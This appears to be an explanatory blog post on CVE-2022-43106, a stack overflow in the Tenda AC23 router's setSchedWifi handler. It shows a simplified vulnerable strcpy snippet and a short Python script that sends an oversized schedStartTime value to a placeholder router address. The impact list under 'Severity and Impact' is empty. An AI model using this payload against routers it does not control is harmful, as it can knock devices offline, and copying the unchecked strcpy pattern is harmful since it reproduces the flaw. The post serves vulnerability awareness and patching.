CVE-2022-43106 - Stack Overflow in Tenda AC23 V16.03.07.45_cn via schedStartTime Parameter (setSchedWifi Function)

In 2022, security researchers discovered a serious vulnerability in the Tenda AC23 router's firmware version V16.03.07.45_cn. Tracked as CVE-2022-43106, this bug is a stack overflow issue in the setSchedWifi function. By sending a specifically crafted request to the schedStartTime parameter, an attacker can cause a stack-based buffer overflow that leads to remote code execution or denial of service (DoS).

In this post, we will explain this vulnerability from the ground up, show you simplified proof-of-concept code, and link to further resources. Our goal is to make this topic understandable, even if you’re not a professional penetration tester or software engineer.

What is a Stack Overflow?

A stack overflow happens when a program writes more data to a buffer (temporary memory) on the stack than what is actually allocated. This can overwrite important parts of the memory, such as function return addresses, leading to unexpected behavior or code execution.

When user-controllable input is not properly checked, attackers can exploit this to gain control over the system.

Where’s the Problem?

Research has revealed that the Tenda AC23 router exposes a management web interface, where users can schedule WiFi on/off times. The setSchedWifi handler function is responsible for this scheduling and accepts several HTTP POST parameters, including schedStartTime.

The router doesn't validate the length of schedStartTime.

- If a value longer than the buffer can hold is supplied, the program writes past the buffer, causing a stack overflow.
- This overflow can overwrite important information and may allow an attacker to run arbitrary code (RCE).

Security analysis of the router firmware found code that looked like this (simplified for clarity)

void setSchedWifi() {
    char schedStartTime_buf[8];
    char *schedStartTime = websGetVar(wp, "schedStartTime", "");
    strcpy(schedStartTime_buf, schedStartTime); // <- Dangerous: no length check
    // ... further code ...
}

The use of strcpy() here is insecure. If the attacker sends more than 8 bytes for schedStartTime, the schedStartTime_buf array will overflow.

Step-by-Step Exploit

1. Find the endpoint: The management web interface exposes an endpoint like /goform/setSchedWifi accepting POST requests.
2. Craft a malicious POST payload: Send an extremely long value for schedStartTime, overflowing the buffer.
3. Trigger execution: Once the overflow occurs, the attacker could crash the process (DoS) or potentially run arbitrary code by controlling the overwritten return address.

Example Python Exploit

import requests

url = 'http://<router_ip>/goform/setSchedWifi';  # Replace <router_ip> with target router's IP
payload = 'A' * 100  # 100 bytes, much larger than 8-byte buffer

data = {
    'schedStartTime': payload,
    'otherParam': 'test'  # Add required parameters as needed
}

try:
    r = requests.post(url, data=data)
    print("Response:", r.text)
except Exception as e:
    print("Error:", e)

> Warning: This is for educational purposes only. Do NOT try this on any device that you do not own or have explicit permission to test.

Severity and Impact

Because the setSchedWifi function is accessible through the router's web admin interface, anyone on the LAN—or remotely, if the interface is exposed—could exploit this flaw. Successful exploitation could result in:

Official References

- MITRE CVE Entry for CVE-2022-43106
- Exploit Database Entry
- NVD Details
- Github Issue from original researcher

How to Protect Yourself

1. Upgrade Router Firmware: Check Tenda's official download page (Chinese) to see if a patched firmware is available.

Conclusion

CVE-2022-43106 is a classic example of an overlooked secure coding practice—improper input validation—leading to dangerous vulnerabilities. If you’re managing a Tenda AC23 router with vulnerable firmware, patch or replace it immediately. Even if you don’t own such a device, take this as a reminder: network devices like home routers are frequent targets, and keeping them updated is crucial.


Do you have questions or want to learn more? Leave a comment or visit the official CVE-2022-43106 page for detailed technical breakdowns.

Timeline

Published on: 11/03/2022 14:15:00 UTC
Last modified on: 11/03/2022 17:28:00 UTC